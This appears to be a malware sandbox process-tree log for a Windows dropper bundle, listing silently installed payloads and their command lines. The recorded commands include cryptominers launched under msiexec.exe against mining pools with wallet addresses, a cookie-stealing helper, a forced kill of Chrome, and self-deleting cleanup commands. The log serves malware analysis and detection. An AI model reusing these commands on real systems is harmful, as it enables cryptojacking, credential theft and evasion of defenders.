C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:3544
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:648
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:4928
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:2204
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:4880
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5860
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yowrwg5eyhn\vpn.exe"C:\Users\Admin\AppData\Local\Temp\yowrwg5eyhn\vpn.exe" /silent /subid=4828⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-LNDGD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-LNDGD.tmp\vpn.tmp" /SL5="$202EA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\yowrwg5eyhn\vpn.exe" /silent /subid=4829⤵PID:4740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5480
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4100
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:5604
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:5616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\q1ocvo0linc\eljseiocjmx.exe"C:\Users\Admin\AppData\Local\Temp\q1ocvo0linc\eljseiocjmx.exe" /quiet SILENT=1 AF=7568⤵PID:4616
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q1ocvo0linc\eljseiocjmx.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q1ocvo0linc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176571 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5472
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\US00S21HKM\setups.exe"C:\Users\Admin\AppData\Local\Temp\US00S21HKM\setups.exe" ll5⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\is-PLFMD.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-PLFMD.tmp\setups.tmp" /SL5="$30116,635399,250368,C:\Users\Admin\AppData\Local\Temp\US00S21HKM\setups.exe" ll6⤵PID:4644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:4608
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5036
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:2668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4180
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4300
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:3552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4316
-
C:\Users\Admin\AppData\Roaming\FA4F.tmp.exe"C:\Users\Admin\AppData\Roaming\FA4F.tmp.exe"5⤵PID:4636
-
C:\Users\Admin\AppData\Roaming\FA4F.tmp.exe"C:\Users\Admin\AppData\Roaming\FA4F.tmp.exe"6⤵PID:5284
-
-
-
C:\Users\Admin\AppData\Roaming\FC53.tmp.exe"C:\Users\Admin\AppData\Roaming\FC53.tmp.exe"5⤵PID:5072
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5348
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5444
-
-
-
C:\Users\Admin\AppData\Roaming\FD3F.tmp.exe"C:\Users\Admin\AppData\Roaming\FD3F.tmp.exe"5⤵PID:5156
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\FD3F.tmp.exe6⤵PID:2744
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4432
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5968
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:6312
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6484
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:892
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffcb0426e00,0x7ffcb0426e10,0x7ffcb0426e202⤵PID:3484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:22⤵PID:1000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1712 /prefetch:82⤵PID:1496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:82⤵PID:3100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:12⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:12⤵PID:3608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:12⤵PID:2284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:12⤵PID:1436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:12⤵PID:4020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:82⤵PID:4140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:82⤵PID:4876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,7736311086168383825,15668434121048921791,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5112 /prefetch:82⤵PID:4896
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4336
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4552
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4364
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\is-2DR91.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-2DR91.tmp\LabPicV3.tmp" /SL5="$3039C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"1⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\is-6IVAF.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-6IVAF.tmp\ppppppfy.exe" /S /UID=lab2142⤵PID:5428
-
C:\Program Files\Mozilla Firefox\OYXPDYLMYC\prolab.exe"C:\Program Files\Mozilla Firefox\OYXPDYLMYC\prolab.exe" /VERYSILENT3⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\is-ACBNP.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-ACBNP.tmp\prolab.tmp" /SL5="$403D4,575243,216576,C:\Program Files\Mozilla Firefox\OYXPDYLMYC\prolab.exe" /VERYSILENT4⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Local\Temp\2a-00615-e39-dfa95-9b96d82f9da5b\Quwutysuge.exe"C:\Users\Admin\AppData\Local\Temp\2a-00615-e39-dfa95-9b96d82f9da5b\Quwutysuge.exe"3⤵PID:5584
-
-
C:\Users\Admin\AppData\Local\Temp\54-f40a8-de4-a2999-a9b21051ede69\Vaefonacixi.exe"C:\Users\Admin\AppData\Local\Temp\54-f40a8-de4-a2999-a9b21051ede69\Vaefonacixi.exe"3⤵PID:5296
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kg0w2tix.zuc\md6_6ydj.exe & exit4⤵PID:6368
-
C:\Users\Admin\AppData\Local\Temp\kg0w2tix.zuc\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\kg0w2tix.zuc\md6_6ydj.exe5⤵PID:6212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vux2eo20.p1c\askinstall31.exe & exit4⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\vux2eo20.p1c\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\vux2eo20.p1c\askinstall31.exe5⤵PID:6552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ly2e35a.35k\toolspab1.exe & exit4⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\4ly2e35a.35k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\4ly2e35a.35k\toolspab1.exe5⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\4ly2e35a.35k\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\4ly2e35a.35k\toolspab1.exe6⤵PID:3532
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4220
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 554091E740FA24B46856F2F4BC0B928E C2⤵PID:3236
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C7470DF8BADFF6C0D20EFAB59783ACE22⤵PID:4936
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5424
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2932
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4088
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6452
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5200
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{28919c6e-2c3c-3b44-b349-fd5ae306cc4a}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3012
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:3252
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4244
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7048